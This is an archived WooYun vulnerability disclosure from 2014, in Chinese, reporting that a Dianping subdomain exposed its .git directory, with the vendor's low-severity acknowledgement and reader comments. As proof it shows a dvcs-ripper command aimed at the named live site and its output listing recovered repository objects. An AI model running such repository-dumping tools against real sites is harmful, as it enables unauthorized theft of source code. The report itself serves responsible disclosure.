大众点评某分站源码可被下载

发表于 2014年12月30日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-089373

漏洞标题：大众点评某分站源码可被下载

漏洞详情

披露状态：

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认，细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述：

大众点评某分站源码可被下载，自查

详细说明：

http://developer.dianping.com/.git/config

[core]<br>
	repositoryformatversion = 0<br>
	filemode = true<br>
	bare = false<br>
	logallrefupdates = true

[core]

repositoryformatversion = 0

filemode = true

bare = false

logallrefupdates = true

WooYun: 友盟网git服务使用不当导致源代码泄露

漏洞证明：

[email protected]:~/dvcs-ripper# perl rip-git.pl -v -u http://developer.dianping.com/.git<br>
[i] Downloading git files from http://developer.dianping.com/.git<br>
[d] found COMMIT_EDITMSG<br>
[d] found config<br>
[d] found description<br>
[d] found HEAD<br>
[d] found index<br>
[!] Not found for packed-refs: 404 Not Found<br>
[!] Not found for objects/info/alternates: 404 Not Found<br>
[!] Not found for info/grafts: 404 Not Found<br>
[d] found logs/HEAD<br>
[!] Not found for objects/2a/2a692920657d0861d246204df95591a0a25a45: 404 Not Found<br>
[!] Not found for objects/bd/9b4120bfb2bde155b63740b5eaa9904c68a106: 404 Not Found<br>
[d] found refs/heads/master<br>
[i] Running git fsck to check for missing items<br>
Checking object directories: 100% (256/256), done.<br>
error: HEAD: invalid sha1 pointer daacd98271c7effbd5724ceec91ca67a65d5e638<br>
error: refs/heads/master does not point to a valid object!<br>
notice: No default references<br>
[d] found objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539<br>
[d] found objects/06/0c87968d255d922b58bbcc0ece7c656995107b<br>
[d] found objects/0b/1262e7608b1945648ddffccbde1ff139fa5622<br>
[d] found objects/0f/144685f7140d2694eeba5609322b4cd79f0bf8<br>
[d] found objects/0f/d275e94660402f80f01505d28b90a23f7e0209<br>
[d] found objects/11/5030dc889ca5f267bf2caf121ff3d3c2db277b<br>
[d] found objects/14/3edf44b0daa4cef1a452ecccac21aee22a8d77<br>
[d] found objects/17/7698bcd493cf25fab0e4314a6dfc92f93d01ba<br>
[d] found objects/1a/740d15247e7d136b2d2f452cefc4aa842a4c7b<br>
[d] found objects/1d/eef144cb17ed2c11c6cdcdcb2d9530fa8d0b47<br>
[d] found objects/1d/425cf7d7e25f81be64d32c406ff66cfb6c4766<br>
[d] found objects/28/f6d6527d83cdd4d472d1edfaade000ae3847ec<br>
[d] found objects/29/fabcc1d5ac5387ede2a645ae1860abe5a0e22a<br>
[d] found objects/2b/d08d7f5be5e97811f86cd1f1c8db2e013da5aa<br>
[d] found objects/38/d6378b829437d673674d3fc7bfec2df2fe6f5e<br>
[d] found objects/3c/b4f31397f6b433f1191806f5d087e408d93657<br>
[d] found objects/3c/c85568af7897773247cff85ef522cb2631eb01<br>
[d] found objects/3f/68f4beb769245c85cc184041fbbcafa3a107bb

[email protected]:~/dvcs-ripper# perl rip-git.pl -v -u http://developer.dianping.com/.git

[i] Downloading git files from http://developer.dianping.com/.git

[d] found COMMIT_EDITMSG

[d] found config

[d] found description

[d] found HEAD

[d] found index

[!] Not found for packed-refs: 404 Not Found

[!] Not found for objects/info/alternates: 404 Not Found

[!] Not found for info/grafts: 404 Not Found

[d] found logs/HEAD

[!] Not found for objects/2a/2a692920657d0861d246204df95591a0a25a45: 404 Not Found

[!] Not found for objects/bd/9b4120bfb2bde155b63740b5eaa9904c68a106: 404 Not Found

[d] found refs/heads/master

[i] Running git fsck to check for missing items

Checking object directories: 100% (256/256), done.

error: HEAD: invalid sha1 pointer daacd98271c7effbd5724ceec91ca67a65d5e638

error: refs/heads/master does not point to a valid object!

notice: No default references

[d] found objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539

[d] found objects/06/0c87968d255d922b58bbcc0ece7c656995107b

[d] found objects/0b/1262e7608b1945648ddffccbde1ff139fa5622

[d] found objects/0f/144685f7140d2694eeba5609322b4cd79f0bf8

[d] found objects/0f/d275e94660402f80f01505d28b90a23f7e0209

[d] found objects/11/5030dc889ca5f267bf2caf121ff3d3c2db277b

[d] found objects/14/3edf44b0daa4cef1a452ecccac21aee22a8d77

[d] found objects/17/7698bcd493cf25fab0e4314a6dfc92f93d01ba

[d] found objects/1a/740d15247e7d136b2d2f452cefc4aa842a4c7b

[d] found objects/1d/eef144cb17ed2c11c6cdcdcb2d9530fa8d0b47

[d] found objects/1d/425cf7d7e25f81be64d32c406ff66cfb6c4766

[d] found objects/28/f6d6527d83cdd4d472d1edfaade000ae3847ec

[d] found objects/29/fabcc1d5ac5387ede2a645ae1860abe5a0e22a

[d] found objects/2b/d08d7f5be5e97811f86cd1f1c8db2e013da5aa

[d] found objects/38/d6378b829437d673674d3fc7bfec2df2fe6f5e

[d] found objects/3c/b4f31397f6b433f1191806f5d087e408d93657

[d] found objects/3c/c85568af7897773247cff85ef522cb2631eb01

[d] found objects/3f/68f4beb769245c85cc184041fbbcafa3a107bb

修复方案：

删除

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-12-3018:22

厂商回复：

确认为运维自动化系统的部分代码，均不涉及业务。
故危害等级为低。
感谢对点评网安全的关注~

评价

2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

又不影响数据有个蛋蛋是吧 @猪猪侠
2010-01-01 00:00 钝刀的老王白帽子 | Rank:0 漏洞数:1)

不是刚才提交过了？
WooYun: 大众点评多个分站源码可被下载

DP的源代码应该没存在服务器上，而是内网的gitlab服务器上。
2010-01-01 00:00 猪猪侠白帽子 | Rank:2932 漏洞数:249)

@xsser 大公司系统多，耦合性强，今天泄露的敏感信息，对于未知的明天影响老大了。
2010-01-01 00:00 http://www.wooyun.org/corps/盛大网络白帽子 | Rank:0 漏洞数:0)

@xsser发火了点评你分给高点